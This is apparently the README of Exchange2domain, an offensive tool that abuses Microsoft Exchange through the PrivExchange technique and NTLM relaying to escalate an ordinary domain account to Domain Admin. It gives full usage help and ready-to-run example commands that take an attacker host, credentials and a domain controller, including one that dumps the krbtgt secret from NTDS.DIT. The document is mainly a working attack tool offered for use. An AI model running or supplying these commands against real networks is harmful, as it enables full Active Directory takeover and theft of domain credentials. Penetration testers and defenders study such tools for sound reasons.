Exchange2domain
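All-in-one tools for privexchange. You only need to open the web server port, so high privileges are not required.
Great writeup! Abusing Exchange: one API call away from Domain Admin.
Requirements
These tools require impacket. You can install it with pip install impacket.
Usage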
usage: Exchange2domain.py [-h] [-u USERNAME] [-d DOMAIN] [-p PASSWORD]
                          [--hashes HASHES] [--no-ssl]
                          [--exchange-port EXCHANGE_PORT] -ah ATTACKER_HOST
                          [-ap ATTACKER_PORT] -th TARGET_HOST
                          [-exec-method [{smbexec,wmiexec,mmcexec}]]
                          [--exchange-version EXCHANGE_VERSION]
                          [--attacker-page ATTACKER_PAGE]
                          [--just-dc-user USERNAME] [--debug]
                          HOSTNAME

Exchange your privileges for Domain Admin privs by abusing Exchange. Use me
with ntlmrelayx

positional arguments:
  HOSTNAME              Hostname/ip of the Exchange server

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --user USERNAME
                        username for authentication
  -d DOMAIN, --domain DOMAIN
                        domain the user is in (FQDN or NETBIOS domain name)
  -p PASSWORD, --password PASSWORD
                        Password for authentication, will prompt if not
                        specified and no NT:NTLM hashes are supplied
  --hashes HASHES       LM:NLTM hashes
  --no-ssl              Don't use HTTPS (connects on port 80)
  --exchange-port EXCHANGE_PORT
                        Alternative EWS port (default: 443 or 80)
  -ah ATTACKER_HOST, --attacker-host ATTACKER_HOST
                        Attacker hostname or IP
  -ap ATTACKER_PORT, --attacker-port ATTACKER_PORT
                        Port on which the relay attack runs (default: 80)
  -th TARGET_HOST, --target-host TARGET_HOST
                        Hostname or IP of the DC
  -exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using
                        -use-vss). Default: smbexec
  --exchange-version EXCHANGE_VERSION
                        Exchange version of the target (default: Exchange2013,
                        choices:Exchange2010,Exchange2010_SP1,Exchange2010_SP2
                        ,Exchange2013,Exchange2013_SP1,Exchange2016)
  --attacker-page ATTACKER_PAGE
                        Page to request on attacker server (default:
                        /privexchange/)
  --just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified.
                        Only available for DRSUAPI approach.
  --debug               Enable debug output

example:
python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip
If you only want to dump krbtgt, use --just-dc-user.
example:
python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
Update
Automatically backs up the old SD so it can be restored.